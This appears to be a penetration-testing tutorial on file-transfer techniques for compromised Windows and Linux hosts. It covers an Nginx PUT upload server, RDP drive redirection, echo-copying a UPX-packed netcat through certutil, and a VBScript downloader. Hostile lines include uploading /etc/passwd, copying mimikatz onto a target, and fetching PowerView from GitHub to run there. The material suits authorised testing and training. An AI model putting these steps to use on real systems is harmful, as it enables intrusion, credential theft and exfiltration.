A good alternative to Apache for transferring files is Nginx: its configuration is less complicated, and its module system does not lead to the security issues that Apache's can.
Nginx Enable PUT
# 1. Create a directory to hold the uploaded files
sudo mkdir -p /var/www/uploads/SecretUploadDirectory
# 2. Change the owner to www-data (the user the Nginx worker processes run as on Debian/Ubuntu) so Nginx can write into it
sudo chown -R www-data:www-data /var/www/uploads/SecretUploadDirectory
# 3. Create the Nginx site configuration /etc/nginx/sites-available/upload.conf with the contents:
server {
    listen 9001;
    location /SecretUploadDirectory/ {
        root /var/www/uploads;
        dav_methods PUT;
    }
}
# 4. Symlink the site into the sites-enabled directory
sudo ln -s /etc/nginx/sites-available/upload.conf /etc/nginx/sites-enabled/
# 5. Restart Nginx so the new site is loaded
sudo systemctl restart nginx.service
# If any error occurs, check /var/log/nginx/error.log
# If Nginx fails to bind port 80 (the default site listens there, and another web server such as Apache may already hold it), remove the default site and restart again
sudo rm /etc/nginx/sites-enabled/default
# Test the upload with curl -T, which sends the file with a PUT request; Nginx answers 201 Created for a new file.
# The file lands under the location's root, i.e. /var/www/uploads/SecretUploadDirectory/
curl -T /etc/passwd http://localhost:9001/SecretUploadDirectory/users.txt
tail -1 /var/www/uploads/SecretUploadDirectory/users.txt
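Two caveats on the configuration above that matter during an engagement: it accepts PUT from anyone who can reach port 9001, and because the same location also serves GET, anything uploaded there (including loot pulled off a target) can be downloaded by anyone who finds it. Nginx's default client_max_body_size of 1m also makes uploads of most binaries fail with 413 Request Entity Too Large. The following variant is an added example, not part of the original page: it restricts the listener to the tester's own address (10.10.14.5 is a placeholder for the attacking machine), raises the body limit, and refuses every method other than GET, HEAD and PUT.

```nginx
server {
    listen 9001;

    # ngx_http_access_module: only the tester's host (placeholder address) may use this listener;
    # every other client gets 403 Forbidden
    allow 10.10.14.5;
    deny  all;

    location /SecretUploadDirectory/ {
        root /var/www/uploads;

        # WebDAV PUT only: no DELETE, MKCOL, COPY or MOVE
        dav_methods PUT;
        # Files created by PUT are owner rw, group/others read-only
        dav_access user:rw group:r all:r;

        # Default is 1m; anything larger is rejected with 413
        client_max_body_size 100m;

        # Methods other than GET, HEAD and PUT are answered with 403
        limit_except GET HEAD PUT {
            deny all;
        }
    }
}
```

Before restarting, confirm the DAV module is compiled in with `nginx -V 2>&1 | grep -o http_dav_module` (the Debian/Ubuntu nginx packages include it, minimal builds may not) and validate the file with `sudo nginx -t`.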
In some cases, hosts will not allow anonymous SMB connections. In that case, start our SMB server with the user/password flags so that the client can authenticate to it with a username and password instead of an anonymous session.
TFTP
On Windows Server, the Install-WindowsFeature PowerShell cmdlet can also be used to add the TFTP client. Both DISM and Install-WindowsFeature require administrative access.
PS C:\> Install-WindowsFeature TFTP-Client
RDP
Remote Desktop is often enabled on Windows machines, and from Linux, rdesktop can be used to expose a local folder inside the remote RDP session: its -r disk:<sharename>=<local path> option redirects the folder, which then appears on the Windows side under the UNC path \\tsclient\<sharename>.
After connecting with the drive redirected (here the folder is shared under the name c), we can interact with it in the remote session like any other UNC path:
copy \\tsclient\c\temp\mimikatz.exe .
Echo Copy
On machines with a very stringent lockdown policy, where no network-based transfer reaches the target and only keyboard or clipboard input does, it may be necessary to echo copy files: encode the binary as text and feed it to the target as a series of echo commands. First, shrink the binary with a packer such as UPX so there is less text to transfer.
c:\> upx.exe --best nc.exe
                       Ultimate Packer for eXecutables
                          Copyright (C) 1996 - 2020
UPX 3.96        Markus Oberhumer, Laszlo Molnar & John Reiser   Jan 23rd 2020

        File size         Ratio      Format      Name
   --------------------   ------   -----------   -----------
     59392 ->     29696   50.00%    win32/pe     nc.exe

Packed 1 file.
Next, we need to convert the binary data to base64. Windows contains a native utility that can do this: certutil. Its -encode switch writes the base64 text in 64-character lines, wrapped in -----BEGIN CERTIFICATE----- and -----END CERTIFICATE----- header lines.
PS C:\> certutil.exe -encode nc.exe nc.txt
Open the resulting text file in a text editor that supports the replacement of extended characters (\n, \r, \t, \0, \x...), such as Notepad++, and turn every line into an echo command that appends it to a file on the target. First, replace the newlines with echo ":
Find: \n
Replace: echo "
The first line is not preceded by a newline, so we manually prepend echo " to it. Next, we replace the carriage returns with " >> nc.txt:
Find: \r
Replace: " >> nc.txt
If the last line is an echo " on its own, remove it. The BEGIN/END CERTIFICATE lines can stay; certutil -decode strips them.
Next, copy all the text and paste it into the shell on the target, pressing enter if needed on the last command. Then use certutil's -decode switch to convert the base64 text in nc.txt back into the binary.
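The editor find/replace above is easy to get wrong (a missed first line, a stray trailing echo). The script below is an added example, not code from the original page: it generates the same echo "..." >> nc.txt lines on the attacker's Linux machine with base64 and sed, and then proves, locally, that running those lines and decoding the result reproduces the original bytes. It assumes GNU coreutils (for base64 -w), a POSIX sh, and a target filename without a | character; the 300-byte sample blob is constructed inside the script. Because the output is headerless base64 there is no certificate header and no leftover echo " line to delete; on the Windows side, certutil -decode nc.txt nc.exe accepts headerless base64 as well as the certificate-wrapped form.

```shell
#!/bin/sh
# Added example, not code from the original page: build the `echo "<chunk>" >> <target>`
# lines that the page assembles by hand in Notepad++, and verify the round trip.
# Assumptions: GNU coreutils base64 (-w), POSIX sh, TARGET contains no '|'.

# make_echo_script SRC TARGET
# Prints one echo command per 76-character base64 line of SRC. Pasted into the
# target's shell, the commands append the base64 text to TARGET.
make_echo_script() {
    src=$1
    target=$2
    base64 -w 76 "$src" | sed -e 's/^/echo "/' -e "s|\$|\" >> $target|"
}

# make_sample OUT
# Writes a constructed 300-byte blob covering every byte value 0x00-0xff
# (so NUL, CR, LF and quote characters are all exercised), then 44 more bytes.
make_sample() {
    out=$1
    : > "$out"
    i=0
    while [ "$i" -lt 300 ]; do
        printf "\\$(printf '%03o' $((i % 256)))" >> "$out"
        i=$((i + 1))
    done
}

# roundtrip_ok SRC TARGET
# Runs the generated echo commands in a scratch directory (standing in for the
# target shell), base64-decodes the assembled file and compares it to SRC byte
# for byte. Returns 0 on a faithful round trip, 1 otherwise.
roundtrip_ok() {
    src=$1
    target=$2
    work=$(mktemp -d)
    make_echo_script "$src" "$target" > "$work/paste.sh"
    ( cd "$work" && sh ./paste.sh )
    if base64 -d "$work/$target" > "$work/decoded.bin" && cmp -s "$src" "$work/decoded.bin"; then
        status=0
    else
        status=1
    fi
    rm -rf "$work"
    return "$status"
}

# Usage: sh echo_copy.sh nc.exe nc.txt > paste_me.txt
if [ "$#" -eq 2 ]; then
    make_echo_script "$1" "$2"
fi
```

The generated lines keep the page's quoted form, which is what PowerShell's echo expects. If the target shell is cmd.exe instead, its echo writes the quotes literally; there, drop the quotes (base64 text contains no cmd metacharacters) and put the redirection first, as in >> nc.txt echo AAEC..., so that a chunk ending in a digit is not parsed as a handle redirection (echo ...1>> nc.txt).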
VBScript
The following VBScript, based on this post, can be used. It takes the URL as its first argument and the output filename as its second, fetches the URL with the Microsoft.XMLHTTP COM object and writes the response body to disk through an ADODB.Stream.
' wget.vbs: download a URL (argument 0) to a file (argument 1)
dim xHttp: Set xHttp = createobject("Microsoft.XMLHTTP")
dim bStrm: Set bStrm = createobject("Adodb.Stream")
xHttp.Open "GET", WScript.Arguments.Item(0), False   ' False = synchronous request
xHttp.Send
with bStrm
    .type = 1                                        ' adTypeBinary
    .open
    .write xHttp.responseBody
    .savetofile WScript.Arguments.Item(1), 2         ' adSaveCreateOverWrite
end with
Saved as wget.vbs, it can be executed as follows:
PS C:\htb> cscript /nologo wget.vbs https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/dev/Recon/PowerView.ps1 PowerView.ps1
In case SMB traffic through the firewall has been restricted, an HTTP-based transfer such as the WebDAV PUT configured above may be a good option, as it relies on HTTP as its transport protocol.
Newer Windows systems can enable the built-in OpenSSH server and receive files over scp. On older Windows systems, the PuTTY Secure Copy client (pscp.exe) can be used.
Echo copying files is very inefficient and can result in a large amount of data being transferred across the clipboard, so we can use an executable packer such as UPX to make the source file as small as possible.
An equivalent JavaScript (JScript) version of the download script, based on the same post, can be run with cscript in the same way.